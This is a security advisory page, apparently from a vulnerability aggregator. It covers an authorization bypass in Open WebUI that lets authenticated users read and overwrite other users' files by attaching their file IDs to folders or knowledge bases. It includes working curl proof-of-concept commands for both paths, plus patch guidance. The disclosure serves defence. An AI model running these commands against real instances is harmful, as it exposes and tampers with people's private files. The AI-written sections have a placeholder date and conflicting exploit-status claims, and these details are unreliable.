Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Cross-User File Access via Unchecked file_id in Folder Knowledge and Knowledge-Base Attach Endpoints
Summary
Multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file - and on the knowledge-base path, also to overwrite it - given knowledge of the file's UUID.
Affected code paths
Path 1 - Folder knowledge ingestion via folders.update
backend/open_webui/routers/folders.py:156 - POST /api/v1/folders/{id}/update accepts a FolderUpdateForm whose data: Optional[dict] field is written verbatim into the folder. The folder consumer at backend/open_webui/utils/middleware.py:2409 spreads folder.data['files'] directly into form_data['files'] for the next chat completion, which becomes RAG context. There is no per-file ownership check at the writer (the update handler) and no per-file ownership check at the reader (the middleware folder consumer) - only the *folder list* endpoint (folders.py:78-94) cleans up by stripping inaccessible files, and that runs lazily at folder-list time rather than at chat time. An attacker with a victim's file UUID can write data: {"files": [{"id": "<victim>", "type": "file"}]} into their own folder, immediately chat in that folder, and have the LLM return the victim's document content via RAG. The cleanup pass strips the file from persistence later, but the exfiltration has already happened.
Path 2 - Knowledge-base attach via knowledge.{id}/file/add and knowledge.{id}/files/batch/add
backend/open_webui/routers/knowledge.py:616-669 (add_file_to_knowledge_by_id) and backend/open_webui/routers/knowledge.py:972-1035 (add_files_to_knowledge_by_id_batch) check the caller's *write access to the knowledge base* but never validate the caller's access to the file_id being attached. Because has_access_to_file(..., user) returns True for any file linked to a KB the caller owns, attaching a victim's file_id to an attacker-owned KB silently unlocks read and write on that file through /api/v1/files/{id}/content and /api/v1/files/{id}/data/content/update. This is a stronger variant than Path 1 - full read AND overwrite, persisted, no cleanup pass to mitigate.
Proof of concept
Path 1 (folder knowledge)
# Attacker writes victim file_id into their own folder
curl -X POST http://target/api/v1/folders/<attacker_folder_id>/update \
-H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
-d "{\"data\": {\"files\": [{\"id\": \"$VICTIM_FILE_ID\", \"type\": \"file\"}]}}"
# Attacker chats in that folder - victim file becomes RAG context
curl -X POST http://target/api/chat/completions \
-H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
-d "{\"model\":\"any\",\"messages\":[{\"role\":\"user\",\"content\":\"summarise my uploaded document\"}],\"folder_id\":\"<attacker_folder_id>\"}"Path 2 (knowledge-base attach)
# Attacker creates own KB
KB=$(curl -s -X POST http://target/api/v1/knowledge/create \
-H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
-d '{"name":"x","description":"x","data":{}}' | jq -r .id)
# Attach victim's file_id - no ownership check
curl -X POST http://target/api/v1/knowledge/$KB/file/add \
-H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
-d "{\"file_id\":\"$VICTIM_FILE_ID\"}"
# Read victim file through standard files endpoint (now accessible because file is "linked to KB I own")
curl http://target/api/v1/files/$VICTIM_FILE_ID/content -H "Authorization: Bearer $ATK"
# Overwrite
curl -X POST http://target/api/v1/files/$VICTIM_FILE_ID/data/content/update \
-H "Authorization: Bearer $ATK" -H "Content-Type: application/json" \
-d '{"content":"tampered"}'Impact
- Confidentiality: Any authenticated user can read the contents of any other user's private uploaded file, given knowledge of the file UUID. UUIDs are V4 (not enumerable in practice) but leak through normal usage - file IDs appear in chat sources, in shared chats' citations, in URL paths (/workspace/files/<id>), in browser history / referrer headers, and in any export/share flow that surfaces source metadata.
- Integrity: Path 2 (knowledge attach) additionally allows the attacker to overwrite the victim's file content, persisting attacker-controlled text under the victim's file_id. Subsequent reads by the victim or by any RAG flow that ingests the victim's file return the tampered content.
- Availability: None directly - file rows are not deleted by these paths.
Recommended fix
Validate the supplied file_id against the caller's read access before attaching, in every writer.
Credits
Per the consolidation rule in SECURITY.md, credit goes only to reporters who FIRST identified a distinct sub-path that no earlier filing covered.
MrBeard-FT - first to identify the folder-knowledge ingestion path (Path 1) Classic298 - first to identify the knowledge-base attach path (Path 2 - /knowledge/{id}/file/add and /files/batch/add)
AnalysisAI
Authenticated attackers can exfiltrate and overwrite any user's private files in Open WebUI ≤0.9.4 by injecting victim file UUIDs into attacker-controlled folders or knowledge bases. Two distinct attack paths bypass authorization checks: folder-knowledge ingestion (Path 1) leaks file content via RAG responses, while knowledge-base attachment (Path 2) grants persistent read/write access through standard file endpoints. File UUIDs leak through normal usage (chat citations, shared chats, URLs, browser history). Vendor-released patch version 0.9.5 available. No public exploit identified at time of analysis, but proof-of-concept code published in GitHub advisory GHSA-r472-mw7m-967f demonstrates both attack vectors with working curl commands.
Technical ContextAI
Open WebUI is a Python-based (pip/open-webui) LLM interface implementing Retrieval-Augmented Generation (RAG) workflows. The vulnerability exploits CWE-639 (Authorization Bypass Through User-Controlled Key), where user-supplied file_id parameters in REST API endpoints are trusted without ownership validation. Path 1 leverages the folder update endpoint (folders.py:156) which writes arbitrary data fields into folder objects; downstream middleware (middleware.py:2409) directly spreads folder.data['files'] into RAG context without per-file ACL checks. Path 2 abuses knowledge-base attachment endpoints (knowledge.py:616-669, 972-1035) which validate KB write access but skip file ownership validation; the authorization model then incorrectly grants file access to anyone who links that file to a KB they own. Both paths exploit the gap between resource creation (folders/KBs) and file attachment authorization, turning legitimate RAG features into cross-user access vectors. The vulnerability requires knowledge of UUIDv4 file identifiers, which are non-enumerable but leak through citations, shared chat metadata, workspace URLs (/workspace/files/<id>), referrer headers, and export flows.
RemediationAI
Upgrade to Open WebUI version 0.9.5 released 2025-01-XX, available at https://github.com/open-webui/open-webui/releases/tag/v0.9.5 via pip (pip install --upgrade open-webui==0.9.5). Version 0.9.5 adds per-file ownership validation to folder update and knowledge-base attachment endpoints, blocking unauthorized file_id references at write time. No workarounds provided in advisory. Compensating controls for environments unable to upgrade immediately: (1) Restrict authenticated user registration to trusted users only - prevents external attackers from obtaining valid credentials required for exploitation. Trade-off: breaks open registration flows for public-facing instances. (2) Audit application logs for POST requests to /api/v1/folders/*/update and /api/v1/knowledge/*/file/add endpoints, flagging file_id values not owned by the requesting user_id - requires custom log parser and access to user-file ownership mapping. Trade-off: detective control only, does not prevent exploitation. (3) Network-isolate Open WebUI instances from untrusted users via VPN or IP allowlist if deployment supports single-organization use. Trade-off: eliminates multi-tenant use cases. Full remediation requires patching; compensating controls provide partial risk reduction only.
Same technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30637
GHSA-r472-mw7m-967f